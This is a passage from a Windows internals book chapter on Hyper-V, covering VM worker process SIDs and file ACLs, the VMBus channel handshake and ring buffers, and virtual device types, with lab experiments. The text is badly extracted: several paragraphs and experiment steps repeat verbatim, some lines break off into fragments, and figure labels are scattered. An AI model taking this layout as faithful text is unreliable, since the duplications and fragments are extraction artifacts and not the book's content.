check how the security of the VM files and the VM Worker process change accordingly.
First, open an administrative command prompt and create a folder in one of the workstation’s
volumes (in the example we used C:\TestVm), using the following command:
md c:\TestVm
Then you need to strip off all the inherited ACEs (Access control entries; see Chapter 7 of Part 1
for further details) and add full access ACEs for the administrators group and the current logged-
on user. The following commands perform the described actions (you need to replace C:\TestVm
with the path of your directory and <UserName> with your currently logged-on user name):
icacls c:\TestVm /inheritance:r
icacls c:\TestVm /grant Administrators:(CI)(OI)F
icacls c:\TestVm /grant <UserName>:(CI)(OI)F
To verify that the folder has the correct ACL, you should open File Explorer (by pressing Win+E
on your keyboard), right-click the folder, select Properties, and finally click the Security tab. You
should see a window like the following one:
Open the Hyper-V Manager, create a VM (and its relative virtual disk), and store it in the newly
created folder (procedure available at the following page: https://docs.microsoft.com/en-us
/virtualization/hyper-v-on-windows/quick-start/create-virtual-machine). For this experiment, you
don’t really need to install an OS on the VM. After the New Virtual Machine Wizard ends, you
should start your VM (in the example, the VM is VM1).
CHAPTER 9 Virtualization technologies
321
Open a Process Explorer as administrator and locate the vmwp.exe process. Right-click it
and select Properties. As expected, you can see that the parent process is vmcompute.exe (Host
Compute Service). If you click the Security tab, you should see that the VM SID is set as the
owner of the process, and the token belongs to the Virtual Machines group:
The SID is composed by reflecting the VM GUID. In the example, the VM’s GUID is {F156B42C-
4AE6-4291-8AD6-EDFE0960A1CE}. (You can verify it also by using PowerShell, as explained in
the “Playing with the Root scheduler” experiment earlier in this chapter). A GUID is a sequence of
16-bytes, organized as one 32-bit (4 bytes) integer, two 16-bit (2 bytes) integers, and 8 final bytes.
The GUID in the example is organized as:
I
0xF156B42C as the first 32-bit integer, which, in decimal, is 4048991276.
I
0x4AE6 and 0x4291 as the two 16-bit integers, which, combined as one 32-bit value, is
0x42914AE6, or 1116818150 in decimal (remember that the system is little endian, so the less
significant byte is located at the lower address).
I
The final byte sequence is 0x8A, 0xD6, 0xED, 0xFE, 0x09, 0x60, 0xA1 and 0xCE (the third
part of the shown human readable GUID, 8AD6, is a byte sequence, and not a 16-bit value),
which, combined as two 32-bit values is 0xFEEDD68A and 0xCEA16009, or 4276999818 and
3466682377 in decimal.
Open a Process Explorer as administrator and locate the vmwp.exe process. Right-click it
and select Properties. As expected, you can see that the parent process is vmcompute.exe (Host
Compute Service). If you click the Security tab, you should see that the VM SID is set as the
Security tab, you should see that the VM SID is set as the
Security
owner of the process, and the token belongs to the Virtual Machines group:
The SID is composed by reflecting the VM GUID. In the example, the VM’s GUID is {F156B42C-
4AE6-4291-8AD6-EDFE0960A1CE}. (You can verify it also by using PowerShell, as explained in
the “Playing with the Root scheduler” experiment earlier in this chapter). A GUID is a sequence of
16-bytes, organized as one 32-bit (4 bytes) integer, two 16-bit (2 bytes) integers, and 8 final bytes.
The GUID in the example is organized as:
I
0xF156B42C as the first 32-bit integer, which, in decimal, is 4048991276.
I
0x4AE6 and 0x4291 as the two 16-bit integers, which, combined as one 32-bit value, is
0x42914AE6, or 1116818150 in decimal (remember that the system is little endian, so the less
significant byte is located at the lower address).
I
The final byte sequence is 0x8A, 0xD6, 0xED, 0xFE, 0x09, 0x60, 0xA1 and 0xCE (the third
part of the shown human readable GUID, 8AD6, is a byte sequence, and not a 16-bit value),
which, combined as two 32-bit values is 0xFEEDD68A and 0xCEA16009, or 4276999818 and
3466682377 in decimal.
322
CHAPTER 9 Virtualization technologies
If you combine all the calculated decimal numbers with a general SID identifier emitted by the
NT authority (S-1-5) and the VM base RID (83), you should obtain the same SID shown in Process
Explorer (in the example, S-1-5-83-4048991276-1116818150-4276999818-3466682377).
As you can see from Process Explorer, the VMWP process’s security token does not include the
Administrators group, and it hasn’t been created on behalf of the logged-on user. So how is it pos-
sible that the VM Worker process can access the virtual hard disk and the VM configuration files?
The answer resides in the VMMS process, which, at VM creation time, scans each component
of the VM’s path and modifies the DACL of the needed folders and files. In particular, the root
folder of the VM (the root folder has the same name of the VM, so you should find a subfolder in
the created directory with the same name of your VM) is accessible thanks to the added virtual
machines security group ACE. The virtual hard disk file is instead accessible thanks to an access-
allowed ACE targeting the virtual machine’s SID.
You can verify this by using File Explorer: Open the VM’s virtual hard disk folder (called Virtual
Hard Disks and located in the VM root folder), right-click the VHDX (or VHD) file, select Properties,
and then click the Security page. You should see two new ACEs other than the one set initially. (One
is the virtual machine ACE; the other one is the VmWorker process Capability for AppContainers.)
If you stop the VM and you try to delete the virtual machine ACE from the file, you will
see that the VM is not able to start anymore. For restoring the correct ACL for the virtual
hard disk, you can run a PowerShell script available at https://gallery.technet.microsoft.com/
Hyper-V-Restore-ACL-e64dee58.
If you combine all the calculated decimal numbers with a general SID identifier emitted by the
NT authority (S-1-5) and the VM base RID (83), you should obtain the same SID shown in Process
Explorer (in the example, S-1-5-83-4048991276-1116818150-4276999818-3466682377).
As you can see from Process Explorer, the VMWP process’s security token does not include the
Administrators group, and it hasn’t been created on behalf of the logged-on user. So how is it pos-
sible that the VM Worker process can access the virtual hard disk and the VM configuration files?
The answer resides in the VMMS process, which, at VM creation time, scans each component
of the VM’s path and modifies the DACL of the needed folders and files. In particular, the root
folder of the VM (the root folder has the same name of the VM, so you should find a subfolder in
the created directory with the same name of your VM) is accessible thanks to the added virtual
machines security group ACE. The virtual hard disk file is instead accessible thanks to an access-
allowed ACE targeting the virtual machine’s SID.
You can verify this by using File Explorer: Open the VM’s virtual hard disk folder (called Virtual
Hard Disks and located in the VM root folder), right-click the VHDX (or VHD) file, select Properties,
and then click the Security page. You should see two new ACEs other than the one set initially. (One
Security page. You should see two new ACEs other than the one set initially. (One
Security
is the virtual machine ACE; the other one is the VmWorker process Capability for AppContainers.)
If you stop the VM and you try to delete the virtual machine ACE from the file, you will
see that the VM is not able to start anymore. For restoring the correct ACL for the virtual
hard disk, you can run a PowerShell script available at https://gallery.technet.microsoft.com/
Hyper-V-Restore-ACL-e64dee58.
CHAPTER 9 Virtualization technologies
323
VMBus
VMBus is the mechanism exposed by the Hyper-V virtualization stack to provide interpartition commu-
nication between VMs. It is a virtual bus device that sets up channels between the guest and the host.
These channels provide the capability to share data between partitions and set up paravirtualized (also
known as synthetic) devices.
The root partition hosts Virtualization Service Providers (VSPs) that communicate over VMBus
to handle device requests from child partitions. On the other end, child partitions (or guests) use
Virtualization Service Consumers (VSCs) to redirect device requests to the VSP over VMBus. Child parti-
tions require VMBus and VSC drivers to use the paravirtualized device stacks (more details on virtual
hardware support are provided later in this chapter in the ”Virtual hardware support” section). VMBus
channels allow VSCs and VSPs to transfer data primarily through two ring buffers: upstream and down-
stream. These ring buffers are mapped into both partitions thanks to the hypervisor, which, as dis-
cussed in the previous section, also provides interpartition communication services through the SynIC.
One of the first virtual devices (VDEV) that the Worker process starts while powering up a VM is the
VMBus VDEV (implemented in Vmbusvdev.dll). Its power-on routine connects the VM Worker process
to the VMBus root driver (Vmbusr.sys) by sending VMBUS_VDEV_SETUP IOCTL to the VMBus root
device (named \Device\RootVmBus). The VMBus root driver orchestrates the parent endpoint of the
bidirectional communication to the child VM. Its initial setup routine, which is invoked at the time the
target VM isn’t still powered on, has the important role to create an XPartition data structure, which is
used to represent the VMBus instance of the child VM and to connect the needed SynIC synthetic inter-
rupt sources (also known as SINT, see the “Synthetic Interrupt Controller” section earlier in this chapter
for more details). In the root partition, VMBus uses two synthetic interrupt sources: one for the initial
message handshaking (which happens before the channel is created) and another one for the synthetic
events signaled by the ring buffers. Child partitions use only one SINT, though. The setup routine al-
locates the main message port in the child VM and the corresponding connection in the root, and, for
each virtual processor belonging to the VM, allocates an event port and its connection (used for receiv-
ing synthetic events from the child VM).
The two synthetic interrupt sources are mapped using two ISR routines, named KiVmbusInterrupt0
and KiVmbusInterrupt1. Thanks to these two routines, the root partition is ready to receive synthetic
interrupts and messages from the child VM. When a message (or event) is received, the ISR queues a
deferred procedure call (DPC), which checks whether the message is valid; if so, it queues a work item,
which will be processed later by the system running at passive IRQL level (which has further implica-
tions on the message queue).
Once VMBus in the root partition is ready, each VSP driver in the root can use the services exposed
by the VMBus kernel mode client library to allocate and offer a VMBus channel to the child VM. The
VMBus kernel mode client library (abbreviated as KMCL) represents a VMBus channel through an
opaque KMODE_CLIENT_CONTEXT data structure, which is allocated and initialized at channel creation
time (when a VSP calls the VmbChannelAllocate API). The root VSP then normally offers the channel
to the child VM by calling the VmbChannelEnabled API (this function in the child establishes the actual
connection to the root by opening the channel). KMCL is implemented in two drivers: one running in
the root partition (Vmbkmclr.sys) and one loaded in child partitions (Vmbkmcl.sys).
324
CHAPTER 9 Virtualization technologies
Offering a channel in the root is a relatively complex operation that involves the following steps:
1.
The KMCL driver communicates with the VMBus root driver through the file object initialized in
the VDEV power-up routine. The VMBus driver obtains the XPartition data structure represent-
ing the child partition and starts the channel offering process.
2.
Lower-level services provided by the VMBus driver allocate and initialize a LOCAL_OFFER data
structure representing a single “channel offer” and preallocate some SynIC predefined messages.
VMBus then creates the synthetic event port in the root, from which the child can connect to
signal events after writing data to the ring buffer. The LOCAL_OFFER data structure represent-
ing the offered channel is added to an internal server channels list.
3.
After VMBus has created the channel, it tries to send the OfferChannel message to the child
with the goal to inform it of the new channel. However, at this stage, VMBus fails because the
other end (the child VM) is not ready yet and has not started the initial message handshake.
After all the VSPs have completed the channel offering, and all the VDEV have been powered up
(see the previous section for details), the VM Worker process starts the VM. For channels to be com-
pletely initialized, and their relative connections to be started, the guest partition should load and start
the VMBus child driver (Vmbus.sys).
Initial VMBus message handshaking
In Windows, the VMBus child driver is a WDF bus driver enumerated and started by the Pnp manager
and located in the ACPI root enumerator. (Another version of the VMBus child driver is also available
for Linux. VMBus for Linux is not covered in this book, though.) When the NT kernel starts in the child
VM, the VMBus driver begins its execution by initializing its own internal state (which means allocat-
ing the needed data structure and work items) and by creating the \Device\VmBus root functional
device object (FDO). The Pnp manager then calls the VMBus’s resource assignment handler routine.
The latter configures the correct SINT source (by emitting a HvSetVpRegisters hypercall on one of the
HvRegisterSint registers, with the help of the WinHv driver) and connects it to the KiVmbusInterrupt2
ISR. Furthermore, it obtains the SIMP page, used for sending and receiving synthetic messages to and
from the root partition (see the “Synthetic Interrupt Controller” section earlier in this chapter for more
details), and creates the XPartition data structure representing the parent (root) partition.
When the request of starting the VMBus’ FDO comes from the Pnp manager, the VMBus driver starts
the initial message handshaking. At this stage, each message is sent by emitting the HvPostMessage
hypercall (with the help of the WinHv driver), which allows the hypervisor to inject a synthetic interrupt
to a target partition (in this case, the target is the partition). The receiver acquires the message by sim-
ply reading from the SIMP page; the receiver signals that the message has been read from the queue
by setting the new message type to MessageTypeNone. (See the hypervisor TLFS for more details.) The
reader can think of the initial message handshake, which is represented in Figure 9-25, as a process
divided in two phases.
CHAPTER 9 Virtualization technologies
325
ROOT PARTITION
CHILD VM
Time
First Phase:
All Channels Enumerated and
Offers Delivered to the
Child VM
Initiate Contact
Version Response
Request Offers
Offer Channel (Multiple Messages)
All Offers Delivered
GPADL Header
GPDAL Body
GPDAL Created
Open Channel
Open Channel Result
Channel Opening
and Ring Buffer Creation
VM
FIGURE 9-25 VMBus initial message handshake.
The first phase is represented by the Initiate Contact message, which is delivered once in the lifetime
of the VM. This message is sent from the child VM to the root with the goal to negotiate the VMBus
protocol version supported by both sides. At the time of this writing, there are five main VMBus pro-
tocol versions, with some additional slight variations. The root partition parses the message, asks the
hypervisor to map the monitor pages allocated by the client (if supported by the protocol), and replies
by accepting the proposed protocol version. Note that if this is not the case (which happens when the
Windows version running in the root partition is lower than the one running in the child VM), the child
VM restarts the process by downgrading the VMBus protocol version until a compatible version is es-
tablished. At this point, the child is ready to send the Request Offers message, which causes the root
partition to send the list of all the channels already offered by the VSPs. This allows the child partition
to open the channels later in the handshaking protocol.
Figure 9-25 highlights the different synthetic messages delivered through the hypervisor for setting
up the VMBus channel or channels. The root partition walks the list of the offered channels located in
the Server Channels list (LOCAL_OFFER data structure, as discussed previously), and, for each of them,
sends an Offer Channel message to the child VM. The message is the same as the one sent at the final
stage of the channel offering protocol, which we discussed previously in the “VMBus” section. So, while
326
CHAPTER 9 Virtualization technologies
the first phase of the initial message handshake happens only once per lifetime of the VM, the second
phase can start any time when a channel is offered. The Offer Channel message includes important
data used to uniquely identify the channel, like the channel type and instance GUIDs. For VDEV chan-
nels, these two GUIDs are used by the Pnp Manager to properly identify the associated virtual device.
The child responds to the message by allocating the client LOCAL_OFFER data structure represent-
ing the channel and the relative XInterrupt object, and by determining whether the channel requires
a physical device object (PDO) to be created, which is usually always true for VDEVs’ channels. In this
case, the VMBus driver creates an instance PDO representing the new channel. The created device is
protected through a security descriptor that renders it accessible only from system and administra-
tive accounts. The VMBus standard device interface, which is attached to the new PDO, maintains
the association between the new VMBus channel (through the LOCAL_OFFER data structure) and
the device object. After the PDO is created, the Pnp Manager is able to identify and load the correct
VSC driver through the VDEV type and instance GUIDs included in the Offer Channel message. These
interfaces become part of the new PDO and are visible through the Device Manager. See the following
experiment for details. When the VSC driver is then loaded, it usually calls the VmbEnableChannel API
(exposed by KMCL, as discussed previously) to “open” the channel and create the final ring buffer.
EXPERIMENT: Listing virtual devices (VDEVs) exposed through VMBus
Each VMBus channel is identified through a type and instance GUID. For channels belonging to
VDEVs, the type and instance GUID also identifies the exposed device. When the VMBus child
driver creates the instance PDOs, it includes the type and instance GUID of the channel in mul-
tiple devices’ properties, like the instance path, hardware ID, and compatible ID. This experiment
shows how to enumerate all the VDEVs built on the top of VMBus.
For this experiment, you should build and start a Windows 10 virtual machine through the
Hyper-V Manager. When the virtual machine is started and runs, open the Device Manager (by
typing its name in the Cortana search box, for example). In the Device Manager applet, click the
View menu, and select Device by Connection. The VMBus bus driver is enumerated and started
through the ACPI enumerator, so you should expand the ACPI x64-based PC root node and then
the ACPI Module Device located in the Microsoft ACPI-Compliant System child node, as shown in
the following figure:
EXPERIMENT: Listing virtual devices (VDEVs) exposed through VMBus
Each VMBus channel is identified through a type and instance GUID. For channels belonging to
VDEVs, the type and instance GUID also identifies the exposed device. When the VMBus child
driver creates the instance PDOs, it includes the type and instance GUID of the channel in mul-
tiple devices’ properties, like the instance path, hardware ID, and compatible ID. This experiment
shows how to enumerate all the VDEVs built on the top of VMBus.
For this experiment, you should build and start a Windows 10 virtual machine through the
Hyper-V Manager. When the virtual machine is started and runs, open the Device Manager (by
typing its name in the Cortana search box, for example). In the Device Manager applet, click the
View menu, and select Device by Connection. The VMBus bus driver is enumerated and started
through the ACPI enumerator, so you should expand the ACPI x64-based PC root node and then
the ACPI Module Device located in the Microsoft ACPI-Compliant System child node, as shown in
the following figure:
CHAPTER 9 Virtualization technologies
327
By opening the ACPI Module Device, you should find another node, called Microsoft Hyper-V
Virtual Machine Bus, which represents the root VMBus PDO. Under that node, the Device
Manager shows all the instance devices created by the VMBus FDO after their relative VMBus
channels have been offered from the root partition.
Now right-click one of the Hyper-V devices, such as the Microsoft Hyper-V Video device, and
select Properties. For showing the type and instance GUIDs of the VMBus channel backing the
virtual device, open the Details tab of the Properties window. Three device properties include
the channel’s type and instance GUID (exposed in different formats): Device Instance path,
Hardware ID, and Compatible ID. Although the compatible ID contains only the VMBus channel
type GUID ({da0a7802-e377-4aac-8e77-0558eb1073f8} in the figure), the hardware ID and device
instance path contain both the type and instance GUIDs.
Opening a VMBus channel and creating the ring buffer
For correctly starting the interpartition communication and creating the ring buffer, a channel
must be opened. Usually VSCs, after having allocated the client side of the channel (still through
VmbChannel Allocate), call the VmbChannelEnable API exported from the KMCL driver. As intro-
duced in the previous section, this API in the child partitions opens a VMBus channel, which has
already been offered by the root. The KMCL driver communicates with the VMBus driver, obtains
the channel parameters (like the channel’s type, instance GUID, and used MMIO space), and creates
By opening the ACPI Module Device, you should find another node, called Microsoft Hyper-V
Virtual Machine Bus, which represents the root VMBus PDO. Under that node, the Device
Manager shows all the instance devices created by the VMBus FDO after their relative VMBus
channels have been offered from the root partition.
Now right-click one of the Hyper-V devices, such as the Microsoft Hyper-V Video device, and
select Properties. For showing the type and instance GUIDs of the VMBus channel backing the
virtual device, open the Details tab of the Properties window. Three device properties include
the channel’s type and instance GUID (exposed in different formats): Device Instance path,
Hardware ID, and Compatible ID. Although the compatible ID contains only the VMBus channel
type GUID ({da0a7802-e377-4aac-8e77-0558eb1073f8} in the figure), the hardware ID and device
instance path contain both the type and instance GUIDs.
328
CHAPTER 9 Virtualization technologies
a work item for the received packets. It then allocates the ring buffer, which is shown in Figure 9-26.
The size of the ring buffer is usually specified by the VSC through a call to the KMCL exported
VmbClientChannelInitSetRingBufferPageCount API.
0xFFFFCA80'3D8C0000
0x0
0x10000
0x20000
0x0
0x10000
0x0
0x1000
0x11000
0x12000
0x22000
0xFFFFCA80'3D8D0000
0xFFFFCA80'3D8E0000
0xFFFFCA80'594A0000
0xFFFFCA80'594B0000
0xFFFFCA80'594C0000
Ring Buffer Virtual Layout
Mapped Ring Buffer
Writing Example
Write Request in the Ring Buffer
Physical Layout
Outgoing
Buffer
Physical
Pages
Outgoing
Buffer
Physical
Pages
Incoming
Buffer
Physical
Pages
Incoming
Buffer
Physical
Pages
Incoming Buffer
Control Page
Outgoing Buffer
Control Page
Outgoing Buffer
Incoming Buffer
FIGURE 9-26 An example of a 16-page ring buffer allocated in the child partition.
The ring buffer is allocated from the child VM’s non-paged pool and is mapped through a memory
descriptor list (MDL) using a technique called double mapping. (MDLs are described in Chapter 5 of
Part 1.) In this technique, the allocated MDL describes a double number of the incoming (or outgoing)
buffer’s physical pages. The PFN array of the MDL is filled by including the physical pages of the buffer
twice: one time in the first half of the array and one time in the second half. This creates a “ring buffer.”
For example, in Figure 9-26, the incoming and outgoing buffers are 16 pages (0x10) large. The
outgoing buffer is mapped at address 0xFFFFCA803D8C0000. If the sender writes a 1-KB VMBus packet
to a position close to the end of the buffer, let’s say at offset 0x9FF00, the write succeeds (no access
violation exception is raised), but the data will be written partially in the end of the buffer and partially
in the beginning. In Figure 9-26, only 256 (0x100) bytes are written at the end of the buffer, whereas the
remaining 768 (0x300) bytes are written in the start.
Both the incoming and outgoing buffers are surrounded by a control page. The page is shared be-
tween the two endpoints and composes the VM ring control block. This data structure is used to keep
track of the position of the last packet written in the ring buffer. It furthermore contains some bits to
control whether to send an interrupt when a packet needs to be delivered.
After the ring buffer has been created, the KMCL driver sends an IOCTL to VMBus, requesting the
creation of a GPA descriptor list (GPADL). A GPADL is a data structure very similar to an MDL and is used
for describing a chunk of physical memory. Differently from an MDL, the GPADL contains an array of
guest physical addresses (GPAs, which are always expressed as 64-bit numbers, differently from the
PFNs included in a MDL). The VMBus driver sends different messages to the root partition for transfer-
ring the entire GPADL describing both the incoming and outcoming ring buffers. (The maximum size
of a synthetic message is 240 bytes, as discussed earlier.) The root partition reconstructs the entire
CHAPTER 9 Virtualization technologies
329
GPADL and stores it in an internal list. The GPADL is mapped in the root when the child VM sends the
final Open Channel message. The root VMBus driver parses the received GPADL and maps it in its own
physical address space by using services provided by the VID driver (which maintains the list of memory
block ranges that comprise the VM physical address space).
At this stage the channel is ready: the child and the root partition can communicate by simply reading
or writing data to the ring buffer. When a sender finishes writing its data, it calls the VmbChannelSend
SynchronousRequest API exposed by the KMCL driver. The API invokes VMBus services to signal an event
in the monitor page of the Xinterrupt object associated with the channel (old versions of the VMBus pro-
tocol used an interrupt page, which contained a bit corresponding to each channel), Alternatively, VMBus
can signal an event directly in the channel’s event port, which depends only on the required latency.
Other than VSCs, other components use VMBus to implement higher-level interfaces. Good examples
are provided by the VMBus pipes, which are implemented in two kernel mode libraries (Vmbuspipe.dll
and Vmbuspiper.dll) and rely on services exposed by the VMBus driver (through IOCTLs). Hyper-V Sockets
(also known as HvSockets) allow high-speed interpartition communication using standard network
interfaces (sockets). A client connects an AF_HYPERV socket type to a target VM by specifying the target
VM’s GUID and a GUID of the Hyper-V socket’s service registration (to use HvSockets, both endpoints
must be registered in the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ Virtualization\
GuestCommunicationServices registry key) instead of the target IP address and port. Hyper-V Sockets
are implemented in multiple drivers: HvSocket.sys is the transport driver, which exposes low-level services
used by the socket infrastructure; HvSocketControl.sys is the provider control driver used to load the
HvSocket provider in case the VMBus interface is not present in the system; HvSocket.dll is a library that
exposes supplementary socket interfaces (tied to Hyper-V sockets) callable from user mode applications.
Describing the internal infrastructure of both Hyper-V Sockets and VMBus pipes is outside the scope of
this book, but both are documented in Microsoft Docs.
Virtual hardware support
For properly run virtual machines, the virtualization stack needs to support virtualized devices.
Hyper-V supports different kinds of virtual devices, which are implemented in multiple components
of the virtualization stack. I/O to and from virtual devices is orchestrated mainly in the root OS. I/O
includes storage, networking, keyboard, mouse, serial ports and GPU (graphics processing unit). The
virtualization stack exposes three kinds of devices to the guest VMs:
I
Emulated devices, also known—in industry-standard form—as fully virtualized devices
I
Synthetic devices, also known as paravirtualized devices
I
Hardware-accelerated devices, also known as direct-access devices
For performing I/O to physical devices, the processor usually reads and writes data from input and
output ports (I/O ports), which belong to a device. The CPU can access I/O ports in two ways:
I
Through a separate I/O address space, which is distinct from the physical memory address
space and, on AMD64 platforms, consists of 64 thousand individually addressable I/O ports.
This method is old and generally used for legacy devices.
330
CHAPTER 9 Virtualization technologies
I
Through memory mapped I/O. Devices that respond like memory components can be accessed
through the processor’s physical memory address space. This means that the CPU accesses
memory through standard instructions: the underlying physical memory is mapped to a device.
Figure 9-27 shows an example of an emulated device (the virtual IDE controller used in Generation 1
VMs), which uses memory-mapped I/O for transferring data to and from the virtual processor.
Root Partition / Host OS
VM1
Hardware
HCS
Processes
File System/Vol
Disk Driver
IDE Storage Driver
VMWP
VMMS
VSPs
Physical
Device
Drivers
VMBus
VID
WinHV
Hypervisor
IDE VDEV
CPU
I/O Devices
Memory
Guest Physical
Address Space
96GB
64GB
4GB
0
FIGURE 9-27 The virtual IDE controller, which uses emulated I/O to perform data transfer.
In this model, every time the virtual processor reads or writes to the device MMIO space or emits
instructions to access the I/O ports, it causes a VMEXIT to the hypervisor. The hypervisor calls the
proper intercept routine, which is dispatched to the VID driver. The VID driver builds a VID message
and enqueues it in an internal queue. The queue is drained by an internal VMWP’s thread, which waits
and dispatches the VP’s messages received from the VID driver; this thread is called the message pump
thread and belongs to an internal thread pool initialized at VMWP creation time. The VM Worker
process identifies the physical address causing the VMEXIT, which is associated with the proper virtual
device (VDEV), and calls into one of the VDEV callbacks (usually read or write callback). The VDEV code
uses the services provided by the instruction emulator to execute the faulting instruction and properly
emulate the virtual device (an IDE controller in the example).
NOTE The full instructions emulator located in the VM Worker process is also used for other
different purposes, such as to speed up cases of intercept-intensive code in a child partition.
The emulator in this case allows the execution context to stay in the Worker process between
intercepts, as VMEXITs have serious performance overhead. Older versions of the hardware
virtualization extensions prohibit executing real-mode code in a virtual machine; for those
cases, the virtualization stack was using the emulator for executing real-mode code in a VM.
CHAPTER 9 Virtualization technologies
331
Paravirtualized devices
While emulated devices always produce VMEXITs and are quite slow, Figure 9-28 shows an example
of a synthetic or paravirtualized device: the synthetic storage adapter. Synthetic devices know to run
in a virtualized environment; this reduces the complexity of the virtual device and allows it to achieve
higher performance. Some synthetic virtual devices exist only in virtual form and don’t emulate any
real physical hardware (an example is synthetic RDP).
Root Partition / Host OS
Hardware
HCS
VMWP
VMMS
Physical
Device
Drivers
VMBus
WinHV
Filesystem
vhdmp
StorVSP
VID
Hypervisor
SynthStor VDEV
CPU
Memory
VM1
Processes
File System/Vol
Disk Driver
StorVSC
FIGURE 9-28 The storage controller paravirtualized device.
Paravirtualized devices generally require three main components:
I
A virtualization service provider (VSP) driver runs in the root partition and exposes virtualiza-
tion-specific interfaces to the guest thanks to the services provided by VMBus (see the previous
section for details on VMBus).
I
A synthetic VDEV is mapped in the VM Worker process and usually cooperates only in the start-
up, teardown, save, and restore of the virtual device. It is generally not used during the regular
work of the device. The synthetic VDEV initializes and allocates device-specific resources (in the
example, the SynthStor VDEV initializes the virtual storage adapter), but most importantly allows
the VSP to offer a VMBus communication channel to the guest VSC. The channel will be used for
communication with the root and for signaling device-specific notifications via the hypervisor.
I
A virtualization service consumer (VSC) driver runs in the child partition, understands the vir-
tualization-specific interfaces exposed by the VSP, and reads/writes messages and notifications
from the shared memory exposed through VMBus by the VSP. This allows the virtual device to
run in the child VM faster than an emulated device.
332
CHAPTER 9 Virtualization technologies
Hardware-accelerated devices
On server SKUs, hardware-accelerated devices (also known as direct-access devices) allow physical de-
vices to be remapped in the guest partition, thanks to the services exposed by the VPCI infrastructure.
When a physical device supports technologies like single-root input/output virtualization (SR IOV) or
Discrete Device Assignment (DDA), it can be mapped to a guest partition. The guest partition can di-
rectly access the MMIO space associated with the device and can perform DMA to and from the guest
memory directly without any interception by the hypervisor. The IOMMU provides the needed security
and ensures that the device can initiate DMA transfers only in the physical memory that belong to the
virtual machine.
Figure 9-29 shows the components responsible in managing the hardware-accelerated devices:
I
The VPci VDEV (Vpcievdev.dll) runs in the VM Worker process. Its rule is to extract the list of
hardware-accelerated devices from the VM configuration file, set up the VPCI virtual bus, and
assign a device to the VSP.
I
The PCI Proxy driver (Pcip.sys) is responsible for dismounting and mounting a DDA-compatible
physical device from the root partition. Furthermore, it has the key role in obtaining the list of
resources used by the device (through the SR-IOV protocol) like the MMIO space and interrupts.
The proxy driver provides access to the physical configuration space of the device and renders
an “unmounted” device inaccessible to the host OS.
I
The VPCI virtual service provider (Vpcivsp.sys) creates and maintains the virtual bus object,
which is associated to one or more hardware-accelerated devices (which in the VPCI VSP are
called virtual devices). The virtual devices are exposed to the guest VM through a VMBus chan-
nel created by the VSP and offered to the VSC in the guest partition.
I
The VPCI virtual service client (Vpci.sys) is a WDF bus driver that runs in the guest VM. It con-
nects to the VMBus channel exposed by the VSP, receives the list of the direct access devices
exposed to the VM and their resources, and creates a PDO (physical device object) for each of
them. The devices driver can then attach to the created PDOs in the same way as they do in
nonvirtualized environments.
When a user wants to map a hardware-accelerated device to a VM, it uses some PowerShell com-
mands (see the following experiment for further details), which start by “unmounting” the device
from the root partition. This action forces the VMMS service to communicate with the standard PCI
driver (through its exposed device, called PciControl). The VMMS service sends a PCIDRIVE_ADD
_VMPROXYPATH IOCTL to the PCI driver by providing the device descriptor (in form of bus, device,
and function ID). The PCI driver checks the descriptor, and, if the verification succeeded, adds it in the
HKLM\System\CurrentControlSet\Control\PnP\Pci\VmProxy registry value. The VMMS then starts a
PNP device (re)enumeration by using services exposed by the PNP manager. In the enumeration phase,
the PCI driver finds the new proxy device and loads the PCI proxy driver (Pcip.sys), which marks the
device as reserved for the virtualization stack and renders it invisible to the host operating system.
CHAPTER 9 Virtualization technologies
333
Root Partition / Host OS
VM 1
Hardware
HCS
Processes
NVME Driver
File System/Vol
Disk Driver
VMWP
VMMS
vPCI VSC
VMBus
VID
Pcip
Pci
WinHV
Hypervisor
VPci VDEV
CPU
Memory
Guest Physical
Address Space
96GB
64GB
4GB
0
IOMMU
vPCI VSP
FIGURE 9-29 Hardware-accelerated devices.
The second step requires assigning the device to a VM. In this case, the VMMS writes the device
descriptor in the VM configuration file. When the VM is started, the VPCI VDEV (vpcievdev.dll) reads the
direct-access device’s descriptor from the VM configuration, and starts a complex configuration phase
that is orchestrated mainly by the VPCI VSP (Vpcivsp.sys). Indeed, in its “power on” callback, the VPCI
VDEV sends different IOCTLs to the VPCI VSP (which runs in the root partition), with the goal to perform
the creation of the virtual bus and the assignment of hardware-accelerated devices to the guest VM.
A “virtual bus” is a data structure used by the VPCI infrastructure as a “glue” to maintain the con-
nection between the root partition, the guest VM, and the direct-access devices assigned to it. The
VPCI VSP allocates and starts the VMBus channel offered to the guest VM and encapsulates it in the
virtual bus. Furthermore, the virtual bus includes some pointers to important data structures, like some
allocated VMBus packets used for the bidirectional communication, the guest power state, and so on.
After the virtual bus is created, the VPCI VSP performs the device assignment.
A hardware-accelerated device is internally identified by a LUID and is represented by a virtual
device object, which is allocated by the VPCI VSP. Based on the device’s LUID, the VPCI VSP locates the
proper proxy driver, which is also known as Mux driver—it’s usually Pcip.sys). The VPCI VSP queries
the SR-IOV or DDA interfaces from the proxy driver and uses them to obtain the Plug and Play informa-
tion (hardware descriptor) of the direct-access device and to collect the resource requirements (MMIO
space, BAR registers, and DMA channels). At this point, the device is ready to be attached to the guest
VM: the VPCI VSP uses the services exposed by the WinHvr driver to emit the HvAttachDevice hypercall
to the hypervisor, which reconfigures the system IOMMU for mapping the device’s address space in the
guest partition.
The guest VM is aware of the mapped device thanks to the VPCI VSC (Vpci.sys). The VPCI VSC is
a WDF bus driver enumerated and launched by the VMBus bus driver located in the guest VM. It is
334
CHAPTER 9 Virtualization technologies
composed of two main components: a FDO (functional device object) created at VM boot time, and
one or more PDOs (physical device objects) representing the physical direct-access devices remapped
in the guest VM. When the VPCI VSC bus driver is executed in the guest VM, it creates and starts the cli-
ent part of the VMBus channel used to exchange messages with the VSP. “Send bus relations” is the first
message sent by the VPCI VSC thorough the VMBus channel. The VSP in the root partition responds by
sending the list of hardware IDs describing the hardware-accelerated devices currently attached to the
VM. When the PNP manager requires the new device relations to the VPCI VSC, the latter creates a new
PDO for each discovered direct-access device. The VSC driver sends another message to the VSP with
the goal of requesting the resources used by the PDO.
After the initial setup is done, the VSC and VSP are rarely involved in the device management. The
specific hardware-accelerated device’s driver in the guest VM attaches to the relative PDO and man-
ages the peripheral as if it had been installed on a physical machine.
EXPERIMENT: Mapping a hardware-accelerated NVMe disk to a VM
As explained in the previous section, physical devices that support SR-IOV and DDE technologies
can be directly mapped in a guest VM running in a Windows Server 2019 host. In this experiment,
we are mapping an NVMe disk, which is connected to the system through the PCI-Ex bus and
supports DDE, to a Windows 10 VM. (Windows Server 2019 also supports the direct assignment
of a graphics card, but this is outside the scope of this experiment.)
